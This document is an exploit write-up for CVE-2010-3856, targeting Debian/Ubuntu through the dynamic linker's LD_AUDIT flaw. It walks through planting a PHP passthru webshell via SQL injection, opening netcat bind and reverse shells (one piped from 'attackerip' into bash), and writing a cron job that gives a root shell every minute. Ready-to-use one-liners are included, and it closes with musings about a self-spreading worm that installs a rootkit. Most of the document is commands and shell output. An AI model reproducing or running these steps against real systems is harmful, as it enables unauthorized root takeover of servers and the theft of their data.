Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root

ameimeng

　　
# Exploit>　　
# Date: 24-10-2010
　　
# Author: jmit
　　
# Mail: fhausberger[at]gmail[dot]com
　　
# Tested on: Debian 5.0.6
　　
# CVE:CVE-2010-3856
　　

　　
--------------
　　
| DISCLAIMER |
　　
--------------
　　

　　
# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
　　
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
　　
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
　　
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
　　
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
　　
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
　　
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
　　
# POSSIBILITY OF SUCH DAMAGE.
　　

　　
---------
　　
| ABOUT |
　　
---------
　　

　　
Debian/Ubuntu remote root exploitation example (GNU dynamic linker DSO vuln).
　　
See (http://www.exploit-db.com/exploits/15304/). Should work on other linux
　　
distros too.
　　

　　
--------------
　　
| BACKGROUND |
　　
--------------
　　

　　
Typically it isn't possible to use a suidshell or modify /etc/passwd directly after
　　
webshell access (user nobody) to gain root access. But with the DSO vuln we can
　　
launch commands as root and we can create a socket and connect to the user or setup
　　
a bindshell.
　　

　　
-----------
　　
| EXPLOIT |
　　
-----------
　　

　　
After you have found a SQL-Injection vuln you can create a php backdoor. This is typically
　　
possible with select into dumpfile/outfile statement. The values are a simple
　　
<? passthru($_GET['c']); ?> backdoor.
　　

　　
---
　　
DROP TABLE IF EXISTS `fm`;
　　
CREATE TABLE `fm` (
　　
`fm` longblob
　　
) TYPE=MyISAM;
　　
insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);
　　
select fm from fm into dumpfile '/opt/lampp/htdocs/xampp_backup.php';
　　
drop table fm;
　　
flush logs;
　　
---
　　

　　
Now you can connect to the server and create a connection with telnet, nc, write
　　
binary with perl -e ' print &quot;\x41\x42\x43\x44&quot;', echo -en '\x41\x42\x43\x44', ...
　　
If direct shell access isn't possible you can use phpcode to create your own
　　
binary with php fwrite:
　　

　　
---
　　
<?php $File = &quot;/tmp/nc&quot;;
　　
$Handle = fopen($File, 'w');
　　
$Data = &quot;\x41\x42\x43\x44&quot;;
　　
fwrite($Handle, $Data);
　　
fclose($Handle); ?>
　　
---
　　

　　
Now use
　　

　　
Bind-Shell:http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash
　　
Reverse-Shell:http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash
　　

　　
in your webbrowser and connect to your shell
　　

　　
$ nc victimip 9999
　　
id
　　
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
　　

　　
---
　　

　　
Now lets exploit the DSO vuln. You need umask 0 for correct
　　
rw-rw-rw creation of exploit /etc/cron.d/exploit
　　

　　
$ umask 0
　　

　　
This is the shellscript for the cron.d entry.
　　

　　
Bind-Shell:$ echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
　　
Reverse-Shell:$ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh
　　

　　
Now make your shellscript executable for cron:
　　

　　
$ chmod u+x /tmp/exploit.sh
　　

　　
Create rw-rw-rw file in cron directory using the setuid ping program:
　　

　　
$ LD_AUDIT=&quot;libpcprofile.so&quot; PCPROFILE_OUTPUT=&quot;/etc/cron.d/exploit&quot; ping
　　

　　
Launch every minute a suid root shell
　　

　　
$ echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
　　

　　
Now you have a root shell every minute.
　　

　　
$ nc attackerip 79
　　
id
　　
uid=0(root) gid=0(root) groups=0(root)
　　

　　
-------------------
　　
| EXPLOIT oneline |
　　
-------------------
　　

　　
echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT=&quot;libpcprofile.so&quot; PCPROFILE_OUTPUT=&quot;/etc/cron.d/exploit&quot; ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
　　

　　
$ nc attackerip 79
　　
id
　　
uid=0(root) gid=0(root) groups=0(root)
　　

　　
------------------------------
　　
| EXPLOIT from webshell only |
　　
------------------------------
　　

　　
http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
　　
http://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh
　　
http://victimip/xampp_backup.php?c=umask 0;LD_AUDIT=&quot;libpcprofile.so&quot; PCPROFILE_OUTPUT=&quot;/etc/cron.d/exploit&quot; ping
　　
http://victimip/xampp_backup.php?c=echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
　　

　　
$ nc attackerip 79
　　
id
　　
uid=0(root) gid=0(root) groups=0(root)
　　

　　
---------------------------------
　　
| EXPLOIT from webshell oneline |
　　
---------------------------------
　　

　　
http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT=&quot;libpcprofile.so&quot; PCPROFILE_OUTPUT=&quot;/etc/cron.d/exploit&quot; ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
　　

　　
$ nc attackerip 79
　　
id
　　
uid=0(root) gid=0(root) groups=0(root)
　　

　　
---------

　　
|>　　
---------
　　

　　
Looks like a wormable bug. The urlobfuscated (IDS/IPS) worm search for SQLI/BSQLI bugs or remote code execution bugs.
　　
Then the worm injects the evil url and do the same for other ips. It installs a rootkit-bot and the game is over.